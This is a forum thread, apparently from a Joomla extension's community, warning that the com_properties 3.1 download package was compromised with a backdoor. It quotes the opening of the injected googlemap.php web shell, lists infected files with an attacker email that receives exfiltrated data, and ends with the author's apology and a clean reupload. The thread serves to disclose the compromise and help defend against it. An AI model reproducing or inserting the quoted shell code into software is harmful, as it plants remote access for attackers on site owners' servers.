WARNING ## ORIGINAL HACKED

com_properties_3_1_0624.zip


com_properties_3_1_0624\site\controllers\googlemap.php

############################################################

DONT DOWNLOAD V3 IT is HACKED !!!!

##########################################################

<?php
$auth = 0;

$name='f2e8695bf8250a85c85615d7600014c8';
$pass='f2e8695bf8250a85c85615d7600014c8';

if($auth == 1) {
if (!isset($_SERVER['PHP_AUTH_USER']) || md5($_SERVER['PHP_AUTH_USER'])!==$name || md5($_SERVER['PHP_AUTH_PW'])!==$pass)
{
header('WWW-Authenticate: Basic realm="HELLO!"');
header('HTTP/1.0 401 Unauthorized');
exit("<h1>Access Denied</h1>");
}
}

@include"config.php";
error_reporting(0); //If there is an error, we'll show it, k?
$password = ""; // You can put a md5 string here too, for plaintext passwords: max 31 chars.
$me = basename(__FILE__);
$cookiename = "wieeeee";

if(isset($_POST['pass'])) //If the user made a login attempt, "pass" will be set eh?
{
if(strlen($password) == 32) //If the length of the password is 32 characters, threat it as an md5.
{
$_POST['pass'] = md5($_POST['pass']);
}
if($_POST['pass'] == $password)
.
.
.
.

##########################################
DO NOT DOWNLOAD THE COMPONENT IT IS HACKED
##########################################


Compromised "HAcked" files:

1.
googlemap.php
com_properties_3_1_0624\site\controllers
Date modified: 29.01.2011 19:50
2.
router.php
com_properties_3_1_0624\site
Date modified: 31.01.2011 09:06
#sends data to $to = "getvdown@gmail.com";##
3.
properties.php
com_properties_3_1_0624\site
Date modified: 31.01.2011 09:06
#sends data to $to = "getvdown@gmail.com";##
4.
controller.php
com_properties_3_1_0624\site
Date modified: 31.01.2011 09:06
$to = "getvdown@gmail.com";


##########################################
DO NOT DOWNLOAD THE COMPONENT IT IS HACKED
##########################################

I found on my PC version of com_properties_3_1_0624 that I downloaded before 29.01.2011 it seams clean!!
#############################################
PLEAS CHECK I CAN'T GUARANTEE THAT IT IS CLEAN
I CHECKED TE ABOVE FILES AND THEY SEEM CLEAN
#############################################
com_properties_3_1_0624

I would like to confirm this by Fabio Esteban!!

@Šala mala - daj napiši URL stranice koja ti je haknuta.

Izbrisana - Deleted


Also note looong time ago V2 I posted website link on this forum after that I constantly got hacking attacks from allover the world (V2 was compromised also until Fabio fixed it)

SO DON'T POST YOUR WEBSITE URL HERE BECAUSE YOU TEL HACKERS WHERE TO FIND YOUR WEBSITE!!


Uči se na tuđim greškama bolje nego na svojim!

My opinion is that first site which need to be hacked is this com-property.com.

I truly don`t believe that Fabio (administrator) ignore those situations with hacked sites. In few posts he also pointed on his site and told to community that his site is 1st on list for hacking. I believe you and him also, but there are few problem`s with this "small" comunity. There are no advanced users except maybe 2-3 which are able to help in development and also there are no quality users to feed up help area and new users.

Učim se, učim, na tuđim pogreškama i radim backup.

The problem is that the site is not hacked but the download zip file so anybody who downloaded it after 29.01.2011 has a hacked installation on his joomla.

Also the hacker uses EgY SpIdEr witch enebels him to collect all information on the host and to upload files as he wishes.

The easiest way to test is to go to Home > Download >Component

download com_properties_3_1_0624


install it on your joomla

go to front end and type
yoursite . com/components/com_properties/controllers/googlemap.php

And you will get this: PICTURE

P.S.
www.com-property.com is not compromised because it was installed before 29.01.2011.

Lets keep this on top!!

It would be nice to have an official reaction on this by Admin!

Sala_Mala: Your link looks like spam - I the "clean" zip that you offered to download here (com_properties_3_1_0624 via hotfile..), the are references to someone e-mail as well - sshadyarchi@gmail.com - In the same files that you listed on top.

So what is the whole buzz about?

lol
i have wersion from last month of 2010 - it is clean
i SOOOO glad i installed my site earlier!
but it still no migrator from 2 to 3 version (((
if anyone need component - i will send it to admin - so it can replase it here

sala_mala - thanks about defining what version is hacked!
it maybe even good to download the hacked version and use it for my self ... eh, dont want to risk it

Sloger pleas can you tell me where exactly did you find that email.

And SHIT I thought that I had a clean version!


############################################
People pleas if you read this DONT DOWNLOAD THE HOTFILE DOCUMENT SLOGER FOUND OUT IT IS INFECTED TOOOO!
############################################

ADMIN HEEEEEEEEEEEELLLLLLLPPPPP!!!!!!!!!!!!!!!

P.S.
Slogar

Pleas can you tell me where did you find sshadyarchi@gmail.com I cannot find it, and I already installed this on my server so pleas can you tell me where is ti!

Than you in advance!

Just unzip the file (com_properties_3_1_0624) on your computer and do the search with SearchMyFiles software..

Ether i am an idiot or I don't know how to use searchmyfiles,
But I cannot find sshadyarchi@gmail.com in the folder that I downloaded form: hotfile. com/dl/103717047/16f90b7/com_properties_3_1_0624.zip. html

Pleas Slogar can you be specific witch folder / file / row!?!?

Thank you!

Sala_mala I just uploaded a clean file for everybody.
I founded in my Pc with the date 02/Nov/2010, here is the link:
Link

Try it and tell if it's good and clean.

Debo asustarme, mi versión es Diciembre 2010.

it is good id it is from 2010 i hope it will help others whith clean install

I cant belive, how is this possible???
Four days ago I download component from your site and next day site is attacked. Today I read this forum, and it`s true infected file is on folder; site/contoller/googlemap.php

Can someone paste a clean content of googlemap.php file?

Or explain which lines of hacked code to remove!

Compromised "HAcked" files:

Look this;

1.
googlemap.php
com_properties_3_1_0624\site\controllers
Date modified: 29.01.2011 19:50
2.
router.php
com_properties_3_1_0624\site
Date modified: 31.01.2011 09:06
#sends data to $to = "getvdown@gmail.com";##
3.
properties.php
com_properties_3_1_0624\site
Date modified: 31.01.2011 09:06
#sends data to $to = "getvdown@gmail.com";##
4.
controller.php
com_properties_3_1_0624\site
Date modified: 31.01.2011 09:06
$to = "getvdown@gmail.com";

sorry, was on vacation.
i gave admin access to other people in this site, was a mistake.
now i upload original version, is safe.
I will work in version for J1.6, when finish i will publish here and in Joomla extensions.
Sorry...